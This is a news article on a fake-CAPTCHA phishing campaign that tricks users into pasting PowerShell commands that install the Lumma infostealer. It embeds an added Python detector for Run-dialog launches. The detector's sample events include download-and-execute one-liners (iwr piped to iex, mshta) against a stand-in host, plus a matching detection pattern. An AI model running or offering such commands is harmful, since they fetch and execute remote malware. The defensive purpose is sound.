Infostealers are the new black: the malware of choice for pretty much all cybercriminals outside the ransomware attack sphere. Although ransomware actors also steal data to use as extortion leverage, the threat that massive, dedicated and ongoing infostealer campaigns pose to passwords cannot be ignored. Now security researchers have observed a new threat campaign that has deployed as many as 5,000 fake CAPTCHA “I Am Not A Robot” tests leading to installation of the most alarming of infostealers, the Lumma stealer malware. Here’s what you need to know and do.
Widespread Attack Uses Fake CAPTCHA Tests To Deploy Lumma Infostealer Threat
Researchers at Netskope Threat Labs have observed a widespread phishing campaign that uses fake CAPTCHA images to target victims searching for PDF documents on major search engines. The technique gets users to complete the I Am Not A Robot tests, which in fact install the notoriously dangerous Lumma infostealer malware, with the ultimate aim of obtaining passwords, credit card details and other personal information. “The attacker uses SEO to trick victims into visiting the pages by clicking on malicious search engine results,” Jan Michael Alcantara, a threat research engineer at Netskope Threat Labs, said, adding that some of these “contain fake CAPTCHAs that trick victims into executing malicious PowerShell commands, ultimately leading to the Lumma Stealer malware.”
At least 7,000 users have been affected so far, according to Alcantara, with most located in North America, Asia, and Southern Europe across the technology, financial services and manufacturing sectors. “The PDF used to deliver Lumma Stealer contains images to download the document,” Alcantara continued, “which contains an embedded link that directs victims to a malicious website.” After clicking on the download image, the report explained, the victim is redirected to the site hosting the fake CAPTCHA test. If the victim follows the instructions, which are a red flag in and of themselves since they require the user to paste clipboard content into a Run window, a PowerShell command is executed that “downloads and executes the Lumma Stealer malware,” Alcantara said.
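The paste-into-Run-window step described above leaves a recognisable trace in endpoint telemetry: a script interpreter started by explorer.exe (the parent of anything launched from the Run dialog) with a command line that fetches and runs remote content. The following added example, not code from the article or from Netskope, shows detection logic over constructed Sysmon-style process-creation events; the field names, sample command lines and the example.invalid domain are all assumptions.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real
# telemetry. Event 0 mirrors the fake-CAPTCHA flow; events 1 and 2 are ordinary
# activity; event 3 is the same pattern via a different interpreter.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/p | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-Date"},          # typed into Run by a user, benign
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},  # developer tooling
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://example.invalid/p"},
]

INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

# Tokens typical of paste-and-run one-liners: remote fetch, in-memory execution,
# hidden window, or a long base64 blob after an -e/-enc switch.
SUSPICIOUS = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|invoke-expression|\biex\b"
    r"|-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|https?://)",
    re.IGNORECASE)

def flag_run_dialog_launch(event):
    """Return a reason string if the event matches the fake-CAPTCHA pattern, else None."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    # Only interpreters started directly by the shell (Run dialog / Start menu) qualify.
    if image not in INTERPRETERS or parent != "explorer.exe":
        return None
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(event["CommandLine"])})
    if not hits:
        return None
    return f"{image} spawned by explorer.exe with {', '.join(hits)}"

def scan(events):
    """Return (index, reason) pairs for every event that should raise an alert."""
    return [(i, r) for i, e in enumerate(events) if (r := flag_run_dialog_launch(e))]

if __name__ == "__main__":
    for i, reason in scan(SAMPLE_EVENTS):
        print(f"event {i}: {reason}")
```

Run over the constructed sample, events 0 and 3 are flagged and the two benign launches are not; in a real deployment the same logic would also be worth applying to the RunMRU registry key, which keeps a history of what was typed into the Run dialog.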
Infostealer Campaign Indicators Of Compromise
Be careful what you search for. That’s very good advice as far as this latest threat campaign is concerned. “Remarkably, nearly half of the 4,000 targeted keywords are related to user guides or manuals,” Alcantara warned, “while over a third are for templates and forms.” The words “pdf,” “free,” “download” and “printable” are among the most frequently repeated keywords used to distribute the malicious documents in these ongoing attacks.
Alcantara has confirmed that Netskope Threat Labs continues to hunt for campaigns that employ these fake CAPTCHA images in PDF files discovered via search engine results, and has so far found that “attackers have been distributing malicious PDFs across over 260 domains and targeting more than 4,000 keywords.” Knowing which PDF files are involved, so that those dangerous CAPTCHA tests are never launched in the first place, is critical. Thankfully, then, all of the indicators of compromise related to this latest infostealer campaign, including full details of the PDFs launching the fake CAPTCHA tests, can be found in the Netskope Threat Labs GitHub repository.